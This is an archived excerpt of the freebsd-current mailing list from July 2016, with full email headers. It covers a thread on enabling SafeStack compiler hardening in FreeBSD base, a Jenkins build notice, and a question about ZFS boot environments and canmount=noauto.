owner-freebsd-current@freebsd.org Thu Jul 28 00:05:34 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id B8021BA77C9 for ; Thu, 28 Jul 2016 00:05:34 +0000 (UTC) (envelope-from shawn.webb@hardenedbsd.org) Received: from mail-qk0-x22f.google.com (mail-qk0-x22f.google.com [IPv6:2607:f8b0:400d:c09::22f]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 6D67E1810 for ; Thu, 28 Jul 2016 00:05:34 +0000 (UTC) (envelope-from shawn.webb@hardenedbsd.org) Received: by mail-qk0-x22f.google.com with SMTP id p74so49269788qka.0 for ; Wed, 27 Jul 2016 17:05:34 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=hardenedbsd-org.20150623.gappssmtp.com; s=20150623; h=date:from:to:cc:subject:message-id:references:mime-version :content-disposition:in-reply-to:user-agent; bh=odV5tY7WfGgpBYMaRq9jfNs8rpE07E/8rH5z7Sa+Ybg=; b=BpK9ofOn8DWrBAstFrvdVW/7AJCHsxZ9ozGUTEVFSLt6BBn6n2YPwOmBo5ZvIzAHcH RYPipPvVTXK/LW2pNZISk8FqYQItocJiFTxqkukTmBG0veUfeBIKpzBTv0T9bUVKeQC3 AlRFWMXutmHTtWj98Zr650v2UWRn7NIikFOz2N3agMpvYFWklYIbGdsPZbvu8SUfMsJe og6bVim4rh7ek6YdyjNdGRcA5tYtIn/hXRKS1Pcdub3YIi3apbbWTrmmyPdy9hIaa7u2 AMzACE7VKV3dF3uWo2ShM1xzIEfKwRWDVu9hm9CNAx4EJLhw3UX848a9RRhLW/dc799W Id9w== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:date:from:to:cc:subject:message-id:references :mime-version:content-disposition:in-reply-to:user-agent; bh=odV5tY7WfGgpBYMaRq9jfNs8rpE07E/8rH5z7Sa+Ybg=; b=fXz/sJGOOYImcvdFDBVxQHktX21WSejFNAdlznQ5Z42VinYyZAMRZgYuzz6YfoqGBQ irE0Vw+aVmx3H5t84yRawRW9SlwM/ixpCdVeU8YhqDP7TA9nP+GmxTolCXiaHTsz0Tq9 Z2Gs5CR6qS3F3iaWQ+UpvqRx5PYuwFPwYz05Zt+xWaqhFLgkiRg4p8eeRFLd0RswokXj p/gThxmvXcNWWBnzttPcjLnbanG5oruIXhvKNGjD4Q+S6oh46gxVLOqQNGxNq/FGU0+E qqMxrD/uR87QhM+CpDSW/XJFsdZsxZ1nrqbeO7q0zDdSVrZHOQ3fs7+Ao7h+1YTRpUWh Tj+g== X-Gm-Message-State: AEkoouvnZ7lgtYgdfiPd2tLYi3UNqu3UYDRRQw19UMOEEhx1kA48FSnkm7tLFonaZVbmOV4d X-Received: by 10.55.64.140 with SMTP id n134mr37742342qka.201.1469664333539; Wed, 27 Jul 2016 17:05:33 -0700 (PDT) Received: from mutt-hardenedbsd (pool-100-16-217-171.bltmmd.fios.verizon.net. [100.16.217.171]) by smtp.gmail.com with ESMTPSA id q13sm5739294qkq.6.2016.07.27.17.05.31 (version=TLS1_2 cipher=ECDHE-RSA-CHACHA20-POLY1305 bits=256/256); Wed, 27 Jul 2016 17:05:32 -0700 (PDT) Date: Wed, 27 Jul 2016 20:05:30 -0400 From: Shawn Webb To: Conrad Meyer Cc: freebsd-current , Ed Maste Subject: Re: SafeStack in base Message-ID: <20160728000530.GH13428@mutt-hardenedbsd> References: <20160727225527.GG13428@mutt-hardenedbsd> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha256; protocol="application/pgp-signature"; boundary="Q59ABw34pTSIagmi" Content-Disposition: inline In-Reply-To: X-Operating-System: FreeBSD mutt-hardenedbsd 12.0-CURRENT-HBSD FreeBSD 12.0-CURRENT-HBSD X-PGP-Key: http://pgp.mit.edu/pks/lookup?op=vindex&search=0x6A84658F52456EEE User-Agent: Mutt/1.6.1 (2016-04-27) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 00:05:34 -0000 --Q59ABw34pTSIagmi Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Jul 27, 2016 at 05:02:07PM -0700, Conrad Meyer wrote: > On Wed, Jul 27, 2016 at 3:55 PM, Shawn Webb = wrote: > > Hey All, > > > > I'm interested in getting SafeStack working in FreeBSD base. Below is a > > link to a simplistic (maybe too simplistic?) patch to enable SafeStack. > > The patch applies against HardenedBSD's hardened/current/master branch. > > Given how simple the patch is, it'd be extremely easy to port over to > > FreeBSD (just line numbers would change). > > > > I am running into a bit of a problem, though. When linking > > lib/libcom_err, I get the following error: > > > > com_err.So: In function `com_err': > > /usr/src/lib/libcom_err/../../contrib/com_err/com_err.c:100: undefined = reference to `__safestack_unsafe_stack_ptr' > > cc: error: linker command failed with exit code 1 (use -v to see invoca= tion) > > *** [libcom_err.so.5.full] Error code 1 > > > > llvm's documentation says that SafeStack has been tested on FreeBSD. > > When and how was it tested? Apparently someone has done some work to > > enable it on FreeBSD, but I can't find any relevant FreeBSD-specific > > documentation. > > > > If someone could point me in the right direction, I'd love to help get > > SafeStack working (and commited?) in FreeBSD. > > > > Link to simplistic patch: http://ix.io/186A > > Link to build log: https://gist.github.com/lattera/5d94f44a5f3e10a28425= cd59104dd169 >=20 > Hey Shawn, >=20 > The relevant link line is: >=20 > > -- libcom_err.so.5.full --- > > building shared library libcom_err.so.5 > > cc -target x86_64-unknown-freebsd12.0 --sysroot=3D/usr/obj/usr/src/tmp = -B/usr/obj/usr/src/tmp/usr/bin -Wl,--no-undefined -Wl,-z,relro -Wl,-z,now -= fsanitize=3Dsafe-stack -Wl,--version-script=3D/usr/src/lib/libcom_err/../..= /contrib/com_err/version-script.map -fstack-protector-strong -shared -Wl,-x= -Wl,--fatal-warnings -Wl,--warn-shared-textrel -o libcom_err.so.5.full -W= l,-soname,libcom_err.so.5 `NM=3D'nm' NMFLAGS=3D'' lorder com_err.So error.= So | tsort -q` >=20 > The problem appears to be an upstream limitation of > -fsanitize=3Dsafe-stack: "Most programs, static libraries, or individual > files can be compiled with SafeStack as is. ??? Linking a DSO with > SafeStack is not currently supported." [0] >=20 > That probably needs to be addressed upstream before it can be enabled glo= bally. Gotcha. If I'm reading correctly, then, SafeStack can only be enabled in bsd.prog.mk (and _not_ bsd.lib.mk). Is that correct? Thanks, --=20 Shawn Webb Cofounder and Security Engineer HardenedBSD GPG Key ID: 0x6A84658F52456EEE GPG Key Fingerprint: 2ABA B6BD EF6A F486 BE89 3D9E 6A84 658F 5245 6EEE --Q59ABw34pTSIagmi Content-Type: application/pgp-signature; name="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQIcBAEBCAAGBQJXmUxHAAoJEGqEZY9SRW7uVmcQAMk2DRvYMSyRPNj01IxwW3BP BYPPgkdAEXLUOba81rpZ9+3PW8zpdNacAp2zlseU+uqlh/XCHDpP3A3MTpPPegXD 9JOZI5xmXcaAJxPlOGxeMIfm0H9l9UKMIUYrr5UJnW4XHyAo6Be1jqIiXVFM8+Td plXnUA1O1Dyv/LKK6DTPlv035duSV0MG6zJYFfa2vnFiDN/lPxPFpC8gqz7BBrap awYDEnwl7Gkeh2P/wMrYIkw24vuDsDy56k3nR/Ez1VTVr0IejwRbQOK8L1pAqBho 5ScUu4HknxjwKwfxlW8xA3jme9MWPwKqqznmZsSTPNIviK+gSK5qLACzzrvyG5MC 86GNfNm7kffvb7Jkz345Vrl9Ihimu1jL47VWgJLqdK2wdm6EpJTMvu7vzVvprijx 1A7kllUCeuhvkQ3/RQ8KO7UKimXKE2hStE0ixWmg1pN7r4Pdr+yo8sB5Amv2fHnX Du/DOf3Wvq/Qzpem5oFqzqHePuntRuHWwN0CLkxSLJazxywrC6meDqes5+YZZABo dCRFXoQxT21t3xJph+/dYWvljR3SMr05BgWzjUA2WKCZVR0bNOsq3nxQt0aNpZrh mySsVB1eORpMjkYJ+HjbASVr+HGw5pRlM3Hp1JeK1ONIEDPPXrdfaXIJcNFI9pZu LvsNb1CyQkDKZNO4dMEC =TV7+ -----END PGP SIGNATURE----- --Q59ABw34pTSIagmi-- From owner-freebsd-current@freebsd.org Thu Jul 28 00:15:17 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id EF619BA7994 for ; Thu, 28 Jul 2016 00:15:17 +0000 (UTC) (envelope-from shawn.webb@hardenedbsd.org) Received: from mail-qk0-x234.google.com (mail-qk0-x234.google.com [IPv6:2607:f8b0:400d:c09::234]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 93F271C9F for ; Thu, 28 Jul 2016 00:15:17 +0000 (UTC) (envelope-from shawn.webb@hardenedbsd.org) Received: by mail-qk0-x234.google.com with SMTP id p74so49416519qka.0 for ; Wed, 27 Jul 2016 17:15:17 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=hardenedbsd-org.20150623.gappssmtp.com; s=20150623; h=date:from:to:cc:subject:message-id:references:mime-version :content-disposition:in-reply-to:user-agent; bh=DPhhB7Yr6h5inTJbH1HRfPeHQsRZlcdYtmV34SO5ENw=; b=dH4MwmeJljadtyNATGCzhRj6dZwS9nf57tbaL0ava2WFSQTPNN3SNAuv3Z2z1iq5wo Dj8cpCxPTyBdl/Ukh+rOAhk7qp+U6oJ12IhY9BmP0tA+CG0qryAkpJNPvao91A4zzdR7 PoaHq9Treyc9iyEf3I5VMVvB0G5tSUbHbVzANaw6y1Mvyhh/Y9YBPeMNfo0umLTFGeB5 MgowYQ8e2MtFVQwEXIM1LK/ni+9rTmkbV9T5VZlR3J6EpfQexB+bpXhx6hGzdtMpHcrC eeh5HnmSNlpEoQxsiRD/3I0R5Qe5p7nVJ5wHPtV6GsdBtzl7CrvYGIboPZIjHw0kaf51 /6RA== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:date:from:to:cc:subject:message-id:references :mime-version:content-disposition:in-reply-to:user-agent; bh=DPhhB7Yr6h5inTJbH1HRfPeHQsRZlcdYtmV34SO5ENw=; b=UyFGwh7Wb1SnSWSZk+HYjAMUiHwjBSo4fawOGzjezBNUFZottIxXGnJsQGC9MmjIps IJ9GShQwYsDTZ75uarafNyt6YSWRE3AHuNdCZ6OtRIayDsLi0n7JDmC1X7N1zBLnQrnr t9opASthnShfv7vNVvLvBXmIbgg7RdnUwle1H013h04q+k6v0uyJlYXDl4mKTccv+SPe 4XHHAYip2+mSaNXO5InEGkujg1woCgr5b8yd9NpqO5VqbxPmFrIBYMkkak8jVwIrW9HZ g3STO45s+QI5emNVkIVXFw3JwivQ3Bfah+go7jc0lS25+OekPMlYDKnWrukPvZyq+AsH Qsxw== X-Gm-Message-State: AEkoouvn2UlbbllahqVtBLMYZDwjyuciiEkfeNCy07J1fQM19v5KvfSybbr2oOPHRa+v4VZv X-Received: by 10.55.44.134 with SMTP id s128mr38706411qkh.198.1469664916665; Wed, 27 Jul 2016 17:15:16 -0700 (PDT) Received: from mutt-hardenedbsd (pool-100-16-217-171.bltmmd.fios.verizon.net. [100.16.217.171]) by smtp.gmail.com with ESMTPSA id d190sm5749683qke.18.2016.07.27.17.15.15 (version=TLS1_2 cipher=ECDHE-RSA-CHACHA20-POLY1305 bits=256/256); Wed, 27 Jul 2016 17:15:15 -0700 (PDT) Date: Wed, 27 Jul 2016 20:15:14 -0400 From: Shawn Webb To: Conrad Meyer Cc: freebsd-current , Ed Maste Subject: Re: SafeStack in base Message-ID: <20160728001514.GI13428@mutt-hardenedbsd> References: <20160727225527.GG13428@mutt-hardenedbsd> <20160728000530.GH13428@mutt-hardenedbsd> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha256; protocol="application/pgp-signature"; boundary="LQAwcd5tHl0Qlnzi" Content-Disposition: inline In-Reply-To: X-Operating-System: FreeBSD mutt-hardenedbsd 12.0-CURRENT-HBSD FreeBSD 12.0-CURRENT-HBSD X-PGP-Key: http://pgp.mit.edu/pks/lookup?op=vindex&search=0x6A84658F52456EEE User-Agent: Mutt/1.6.1 (2016-04-27) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 00:15:18 -0000 --LQAwcd5tHl0Qlnzi Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Jul 27, 2016 at 05:11:12PM -0700, Conrad Meyer wrote: > On Wed, Jul 27, 2016 at 5:05 PM, Shawn Webb = wrote: > > On Wed, Jul 27, 2016 at 05:02:07PM -0700, Conrad Meyer wrote: > >> The problem appears to be an upstream limitation of > >> -fsanitize=3Dsafe-stack: "Most programs, static libraries, or individu= al > >> files can be compiled with SafeStack as is. ??? Linking a DSO with > >> SafeStack is not currently supported." [0] > >> > >> That probably needs to be addressed upstream before it can be enabled = globally. > > > > Gotcha. If I'm reading correctly, then, SafeStack can only be enabled in > > bsd.prog.mk (and _not_ bsd.lib.mk). Is that correct? >=20 > That is my reading of the page. I'll admit my total experience with > -fsanitize=3Dsafe-stack is limited to glancing at the web page 5 minutes > ago, so don't consider my take authoritative. Doing a test build right now with SafeStack enabled only in bsd.prog.mk. I'll report back with results tonight or tomorrow. Thanks again, --=20 Shawn Webb Cofounder and Security Engineer HardenedBSD GPG Key ID: 0x6A84658F52456EEE GPG Key Fingerprint: 2ABA B6BD EF6A F486 BE89 3D9E 6A84 658F 5245 6EEE --LQAwcd5tHl0Qlnzi Content-Type: application/pgp-signature; name="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQIcBAEBCAAGBQJXmU6RAAoJEGqEZY9SRW7uUXoP/0WJX7Mp3MP5NLhlBRd9rTMM wvW4Tlg7idvKqBibZs3pO6p4UbH1NdxcfKoIFJ+2TvV8CKS8uTA/3jTIDjpT0CWB wg7aSGQRaHbrcBCWEWY3RT9uYjYrhBnS0txFZ6e/7Ki6+vDUoCLt2gTz3g1cyW9I XHVbtUHRKLQa21rAg4OQe0YInmFh/H+p1ndObn7KSGosWq8vJk4qhVmpxs06seTk iKxiJ0HiXqcFuyOIRwVlBb9w48lylHcqcQxlbkiTcXST5VR+cuyl88GAt5gj0Imb cnjP9pqVhBBfX2msP2w5G7tBJKZf8jIZ3YCqNj1xrmqDa5JKQS1dSAIIYnHvvGsP 6GfU9YpYOt8ixMCFEQvY5SeaqOtq0Mqp8S0EnZuDrN/f8SqaniLmkprh2DEF1mQK IeGE3x2oO2Re8xuLD5Tlo/gBbuCki5nKS4zlfNhmHFYexauYxqyrKL3OBPgfpSL9 fhRsU7+6ATB6Z8wLmSGv+sGNh8TBc8BA5LyVNfAHrznT/2QjoXyalvf1lesdI4eE RyBe+SOYn0qzOF+cMVroVPAnTF1e/9LzNBiX/epSoLBXSGgAcXJXiRlCFHFgC5ZD 3ZaaDVWF1qIkoDDZWZliRDHFMyCkDrP7hQqUsrb/zut8yoU/FxJtrG/FQhS5zIPu H3xrltLKxwmNiaeyzYjk =VzMH -----END PGP SIGNATURE----- --LQAwcd5tHl0Qlnzi-- From owner-freebsd-current@freebsd.org Thu Jul 28 00:19:01 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id DBA49BA7A7D for ; Thu, 28 Jul 2016 00:19:01 +0000 (UTC) (envelope-from cse.cem@gmail.com) Received: from mail-it0-f46.google.com (mail-it0-f46.google.com [209.85.214.46]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id AF7E11E71; Thu, 28 Jul 2016 00:19:01 +0000 (UTC) (envelope-from cse.cem@gmail.com) Received: by mail-it0-f46.google.com with SMTP id f6so155746476ith.1; Wed, 27 Jul 2016 17:19:01 -0700 (PDT) X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:mime-version:reply-to:in-reply-to:references :from:date:message-id:subject:to:cc; bh=geOKPkxl9e18h0o+FF9jvwFRwMT1gmMlgaiu7TYAFzs=; b=ZeWWw65/bsq+wFOH0RMoE0iCgeP1bueXgX5ZNrFSLqv5eI1PJZLLuZUk6LfOAmQs2b Ywrxfcc3mfKPQvlbOHFhnJyDejAAiEBhbdjWrjXlNJ8EwYNjWH8iV275i2fdNc+WlftF fGpMqwSEzvcVSg4YpYubxYGjGReUqJNLg/CTjeP7QEqKzRy5f8g9bZGCxdXQL68Z+Yt4 mBPXFo5znd0ypeLLQvgOlPWLnCHV7ECaUccDayvQ9wiqHDAhTC6tIUiXAddRDYRAQwtH TJVF/dR98Ro12nfiNQPkHxZumw94AhYUpllsOeUUoUq25ZjSVjgpH/Bm0ClWj+hUZFZO /+9Q== X-Gm-Message-State: ALyK8tJm6H2VqCxA3WtRkThZWM9O+CtNgKSCmuebNjLab7X8qYIZzYlLXbcRn6uKLEQ1hg== X-Received: by 10.36.9.137 with SMTP id 131mr103249909itm.89.1469664673638; Wed, 27 Jul 2016 17:11:13 -0700 (PDT) Received: from mail-it0-f43.google.com (mail-it0-f43.google.com. [209.85.214.43]) by smtp.gmail.com with ESMTPSA id o74sm3889614ioe.37.2016.07.27.17.11.13 (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Wed, 27 Jul 2016 17:11:13 -0700 (PDT) Received: by mail-it0-f43.google.com with SMTP id j124so65501864ith.1; Wed, 27 Jul 2016 17:11:13 -0700 (PDT) X-Received: by 10.36.3.193 with SMTP id e184mr36939588ite.34.1469664673174; Wed, 27 Jul 2016 17:11:13 -0700 (PDT) MIME-Version: 1.0 Reply-To: cem@freebsd.org Received: by 10.36.233.67 with HTTP; Wed, 27 Jul 2016 17:11:12 -0700 (PDT) In-Reply-To: <20160728000530.GH13428@mutt-hardenedbsd> References: <20160727225527.GG13428@mutt-hardenedbsd> <20160728000530.GH13428@mutt-hardenedbsd> From: Conrad Meyer Date: Wed, 27 Jul 2016 17:11:12 -0700 X-Gmail-Original-Message-ID: Message-ID: Subject: Re: SafeStack in base To: Shawn Webb Cc: freebsd-current , Ed Maste Content-Type: text/plain; charset=UTF-8 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 00:19:02 -0000 On Wed, Jul 27, 2016 at 5:05 PM, Shawn Webb wrote: > On Wed, Jul 27, 2016 at 05:02:07PM -0700, Conrad Meyer wrote: >> The problem appears to be an upstream limitation of >> -fsanitize=safe-stack: "Most programs, static libraries, or individual >> files can be compiled with SafeStack as is. ??? Linking a DSO with >> SafeStack is not currently supported." [0] >> >> That probably needs to be addressed upstream before it can be enabled globally. > > Gotcha. If I'm reading correctly, then, SafeStack can only be enabled in > bsd.prog.mk (and _not_ bsd.lib.mk). Is that correct? That is my reading of the page. I'll admit my total experience with -fsanitize=safe-stack is limited to glancing at the web page 5 minutes ago, so don't consider my take authoritative. Best, Conrad From owner-freebsd-current@freebsd.org Thu Jul 28 00:23:14 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 68BDDBA7BEB; Thu, 28 Jul 2016 00:23:14 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (jenkins-9.freebsd.org [8.8.178.209]) by mx1.freebsd.org (Postfix) with ESMTP id 5AB361357; Thu, 28 Jul 2016 00:23:14 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (localhost [127.0.0.1]) by jenkins-9.freebsd.org (Postfix) with ESMTP id 8744F133; Thu, 28 Jul 2016 00:23:14 +0000 (UTC) Date: Thu, 28 Jul 2016 00:23:13 +0000 (GMT) From: jenkins-admin@FreeBSD.org To: bdrewery@FreeBSD.org, jenkins-admin@FreeBSD.org, freebsd-current@FreeBSD.org, freebsd-i386@FreeBSD.org Message-ID: <1826620966.26.1469665394562.JavaMail.jenkins@jenkins-9.freebsd.org> In-Reply-To: <490642186.22.1469657548877.JavaMail.jenkins@jenkins-9.freebsd.org> References: <490642186.22.1469657548877.JavaMail.jenkins@jenkins-9.freebsd.org> Subject: FreeBSD_HEAD_i386 - Build #3702 - Fixed MIME-Version: 1.0 X-Jenkins-Job: FreeBSD_HEAD_i386 X-Jenkins-Result: SUCCESS Precedence: bulk Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Content-Filtered-By: Mailman/MimeDel 2.1.22 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 00:23:14 -0000 FreeBSD_HEAD_i386 - Build #3702 - Fixed: Build information: https://jenkins.FreeBSD.org/job/FreeBSD_HEAD_i386/3702/ Full change log: https://jenkins.FreeBSD.org/job/FreeBSD_HEAD_i386/3702/changes Full build log: https://jenkins.FreeBSD.org/job/FreeBSD_HEAD_i386/3702/console Change summaries: 303419 by bdrewery: Fix non-amd64 build from r292043 after reconnecting in r303410. MFC after: 3 days X-MFC-With: r303410 Sponsored by: EMC / Isilon Storage Division From owner-freebsd-current@freebsd.org Thu Jul 28 02:05:52 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id A4B4ABA5BA6 for ; Thu, 28 Jul 2016 02:05:52 +0000 (UTC) (envelope-from rwestlun@gmail.com) Received: from mail-qt0-x22e.google.com (mail-qt0-x22e.google.com [IPv6:2607:f8b0:400d:c0d::22e]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 6F1D01655 for ; Thu, 28 Jul 2016 02:05:52 +0000 (UTC) (envelope-from rwestlun@gmail.com) Received: by mail-qt0-x22e.google.com with SMTP id 52so40737960qtq.3 for ; Wed, 27 Jul 2016 19:05:52 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=date:from:to:subject:message-id:mime-version:content-disposition :user-agent; bh=3Yr6iXNdZU+EhZmO+ePAWvO4Gql99AydGFydPLyKHQI=; b=0HOIB4MA3RJBcn2cxAv7Qmv81Nb7KVQu8o1SeYP6fYmhNEgdu12Sg0e5s/wDtg11WT 6PS9QxyHkTcqAvdaxkA656WhNaXuraE9MBrDnap7Z81EulGxdqdrWwNoKoJ6xAZCe0Mz 7mXVDN5AKgusMyqezKYidieOxhHPbirHZXZUu0PB7SPUfJzYPeAe56Qh6bc8fmWtspyQ 9MT2cZ+BV71V1aRSOVFKjh/FesckoD9grY61mKbUq9NHaCOTmB+WHd5VQ6z/dMmdYKxc NjZ5ng8RyGJE68/TNLYe9iSYLa76CBoDG60LIwO7x+gjZrM7wH9tprQKtTFTtZ8dYz3V r9QA== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:date:from:to:subject:message-id:mime-version :content-disposition:user-agent; bh=3Yr6iXNdZU+EhZmO+ePAWvO4Gql99AydGFydPLyKHQI=; b=R9WecL3BvlNRCpfmkU1Zwl9+CX9ijVLfBFotvZPhmbIw/H8Qn3gJOlS2quI4O7WN6Q gMqZ7XpX2ec5TxPgnwEEFbjlUpDuxoLlp4GUKhIZ2g82y9GBxTkfeS/24GNcsPw7n6r4 25Bim/cnVO29Wk78Y8OqmbwJymHB/7/eXlSvUIGylLAGCMGwUQtL29/VyZz+YZFLL57p 9DaRK/FHQhIhZgHpHtYQK92KHDXHEXeBRGxFoqQNujSyhqXQiv+Lua0hzijixNYaTwEh mD2Abf2y5lHFSGr3N35gerLo78ccSZqshmeXLo3CPxbijlMrOF7O/TdsFydURX1TBjjb 7Osg== X-Gm-Message-State: AEkooutVbK4uMRGWitT0AysQC32QVGTmYhoOjKKYlWZjQ+pIXYq/j2a1NPC5vZWgKQ6pGw== X-Received: by 10.200.45.108 with SMTP id o41mr52597534qta.100.1469671551314; Wed, 27 Jul 2016 19:05:51 -0700 (PDT) Received: from gmail.com (c-98-216-247-110.hsd1.ma.comcast.net. [98.216.247.110]) by smtp.gmail.com with ESMTPSA id u23sm5966326qte.30.2016.07.27.19.05.50 for (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Wed, 27 Jul 2016 19:05:50 -0700 (PDT) Date: Wed, 27 Jul 2016 22:05:48 -0400 From: Randy Westlund To: freebsd-current@freebsd.org Subject: Boot environments and zfs canmount=noauto Message-ID: <20160728020548.GD26793@gmail.com> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha256; protocol="application/pgp-signature"; boundary="bi5JUZtvcfApsciF" Content-Disposition: inline User-Agent: Mutt/1.6.1 (2016-04-27) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 02:05:52 -0000 --bi5JUZtvcfApsciF Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable I'm trying to follow Michael Dexter's post about using bhyve with boot environments. It involves moving all child datasets under zroot/ROOT/default, so that you can have entirely independent systems. http://callfortesting.org/bhyve-boot-environments/ > Let's change the datasets with "canmount on" to "canmount noauto": > [snip] > Considering that this setting is harmless to a system with a single > boot environment, I would not object to it being the default. Hint > hint.=20 When I set all the datasets with canmount=3Don to canmount=3Dnoauto, only zroot/ROOT/default gets mounted on next boot. It's my understanding that 'zfs mount -a' doesn't mount datasets with canmount=3Dnoauto, but if I leave them with canmount=3Don, they will try to mount regardless of which BE is active. I'm trying this with 11.0-BETA2. Can sometime tell me what I'm missing? --bi5JUZtvcfApsciF Content-Type: application/pgp-signature; name="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJXmWh8AAoJEGaweXjzNsmpWO4H/0M+Rjs5p77M82Vsdq19o0jW pfG008xB7jHetl/mJv8+FNlksklE/vhlRTJa+HVLtmG6l4sXCf5eTCqKLeXZuLJF aBmzA18KVHQcEeIgEWyIXWvLuW2ytwA/RrTBa8jbILV/tfJZ9oKjeta0MqOflkzh ncXnuJwUc1gKafrhgxViYnd8aIrw614mNGGKVBiRNSPtmDkKuodszZtA45M8F2El 46rH84QVAmUrXMx7+T6VV/FAZQdaC9QPP4kp6xWy6z9r3f2ZIsolTA+ZJIlGRrfj PqfFfWLrKfpywKNdD+cIplFs4P7InbOu1HjuRRob2kZsrfwfdluBsLWynPjuGjE= =Pnbx -----END PGP SIGNATURE----- --bi5JUZtvcfApsciF-- From owner-freebsd-current@freebsd.org Thu Jul 28 02:18:50 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 73A27BA5EA1 for ; Thu, 28 Jul 2016 02:18:50 +0000 (UTC) (envelope-from allanjude@freebsd.org) Received: from mx1.scaleengine.net (mx1.scaleengine.net [209.51.186.6]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 527891B04 for ; Thu, 28 Jul 2016 02:18:49 +0000 (UTC) (envelope-from allanjude@freebsd.org) Received: from [10.1.1.2] (unknown [10.1.1.2]) (Authenticated sender: allanjude.freebsd@scaleengine.com) by mx1.scaleengine.net (Postfix) with ESMTPSA id D44941F00 for ; Thu, 28 Jul 2016 02:18:42 +0000 (UTC) Subject: Re: Boot environments and zfs canmount=noauto To: freebsd-current@freebsd.org References: <20160728020548.GD26793@gmail.com> From: Allan Jude Message-ID: Date: Wed, 27 Jul 2016 22:18:38 -0400 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; 